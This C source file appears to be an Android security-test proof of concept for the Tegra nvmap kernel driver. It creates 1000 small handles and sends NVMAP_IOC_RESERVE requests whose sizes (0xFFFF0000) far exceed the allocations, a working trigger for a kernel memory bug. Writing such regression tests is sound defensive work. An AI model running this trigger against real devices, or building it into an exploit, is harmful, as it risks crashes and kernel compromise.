/*
* Copyright (C) 2017 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
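/*
 * PoC that exercises the Tegra nvmap driver (/dev/nvmap): it creates a large
 * number of nvmap handles, allocates small (0x40-byte) backing buffers for
 * them, and then issues NVMAP_IOC_RESERVE requests whose per-handle sizes
 * (0xFFFF0000) far exceed the allocations. The structures and ioctl numbers
 * below mirror the nvmap UAPI so the PoC builds without vendor kernel headers.
 */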
#define _GNU_SOURCE
#include <linux/types.h> /* __u32, __u64, __s32 */
#include <dirent.h>
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <unistd.h>
struct nvmap_handle_param {
    __u32 handle;         /* nvmap handle */
    __u32 param;          /* size/align/base/heap etc. */
    unsigned long result; /* returns requested info */
};
struct nvmap_create_handle {
    union {
        __u32 id;         /* FromId */
        __u32 size;       /* CreateHandle */
        __s32 fd;         /* DmaBufFd or FromFd */
    };
    __u32 handle;         /* returns nvmap handle */
};
struct nvmap_alloc_handle {
    __u32 handle;         /* nvmap handle */
    __u32 heap_mask;      /* heaps to allocate from */
    __u32 flags;          /* wb/wc/uc/iwb etc. */
    __u32 align;          /* min alignment necessary */
};
struct nvmap_cache_op_list {
    __u64 handles;        /* Ptr to u32 type array, holding handles */
    __u64 offsets;        /* Ptr to u32 type array, holding offsets
                           * into handle mem */
    __u64 sizes;          /* Ptr to u32 type array, holding sizes of memory
                           * regions within each handle */
    __u32 nr;             /* Number of handles */
    __s32 op;             /* wb/wb_inv/inv */
};
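/* nvmap ioctl command numbers used by this PoC */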
#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
/* common carveout heaps */
#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
#define NVMAP_HEAP_IOVMM (1ul<<30) /* IOVMM heap bit from the nvmap UAPI; needed by the mask below */
#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
/* allocation flags */
#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
#define NVMAP_HANDLE_SECURE (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
enum {
    NVMAP_PAGES_UNRESERVE = 0,
    NVMAP_PAGES_RESERVE
};
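/* Globals shared by the PoC: the nvmap fd, ioctl request buffers and handle arrays. */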
int g_fd = -1;
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
struct nvmap_create_handle* g_allocation = NULL;
struct nvmap_alloc_handle g_real_alloc = {0};
struct nvmap_cache_op_list g_op_list = {0};
#define MAX_HANDLE_NUM (1000)
int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
int open_driver() {
    char* dev_path = "/dev/nvmap";
    g_fd = open(dev_path, O_RDWR);
    if (g_fd < 0) {
        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
    } else {
        printf("[*] open file(%s) succeeded!\n", dev_path);
    }
    return g_fd;
}
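/* Create a new nvmap handle of g_allocation->size bytes and return its id. */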
int trigger_nvmap_create() {
    g_allocation->handle = -1;
    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
    printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
    return g_allocation->handle;
}
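/* Allocate backing memory for an existing handle using the parameters in g_real_alloc. */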
void trigger_nvmap_alloc(int handle) {
    g_real_alloc.handle = handle;
    ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
    printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
}
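/* Release a previously created nvmap handle. */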
void trigger_nvmap_free(int handle) {
    ioctl(g_fd, NVMAP_IOC_FREE, handle);
    printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
}
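/* Adjust scheduling priority and pin the calling thread to the given CPU mask
 * (kept for experimentation; not called from main()). */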
void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    setpriority(PRIO_PROCESS, gettid(), privi);
    printf("[*] setpriority(%d) errno = %d\n", privi, errno);
    /* bind the calling thread to the CPUs in cpu_mask; the kernel accepts a
     * mask shorter than sizeof(cpu_set_t) */
    if (sched_setaffinity(gettid(), sizeof(cpu_mask), (const cpu_set_t*)&cpu_mask) < 0) {
        printf("[*] sched_setaffinity(%lu) errno = %d\n", cpu_mask, errno);
    }
}
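/* Fill in the create/alloc/reserve request templates used by the ioctl calls. */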
void prepare_data() {
    int i;
    void* data = calloc(1, 0x1000);
    g_allocation = (struct nvmap_create_handle*)data;
    g_allocation->size = 0x40;
    g_real_alloc.align = 0x40;
    g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
    g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
    /* the reserve request covers every handle we will create */
    g_op_list.handles = (__u64)(unsigned long)(&g_handles_for_alloc[0]);
    g_op_list.offsets = (__u64)(unsigned long)calloc(1, MAX_HANDLE_NUM * 4);
    g_op_list.sizes = (__u64)(unsigned long)malloc(MAX_HANDLE_NUM * 4);
    /* request an oversized region (0xFFFF0000 bytes) for each 0x40-byte handle */
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        ((int*)(unsigned long)(g_op_list.sizes))[i] = 0xFFFF0000;
    }
    g_op_list.nr = MAX_HANDLE_NUM;
    g_op_list.op = NVMAP_PAGES_RESERVE;
}
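/* Create MAX_HANDLE_NUM handles and remember their ids. */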
void create_handles() {
    int i;
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        g_handles_for_alloc[i] = trigger_nvmap_create();
    }
}
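/* Issue the NVMAP_IOC_RESERVE request that covers all created handles. */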
void trigger_rw_handle(int handle) {
    (void)handle; /* the reserve list in g_op_list already names every handle */
    ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
    printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
}
int main(int argc, char** argv) {
    int i;
    if (open_driver() < 0) {
        return -1;
    }
    prepare_data();
    create_handles();
    /* give each handle backing memory before issuing the reserve requests */
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        trigger_nvmap_alloc(g_handles_for_alloc[i]);
    }
    printf("[*] Begin to trigger bug....\n");
    sleep(1);
    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
        trigger_rw_handle(g_handles_for_alloc[i]);
    }
    return 0;
}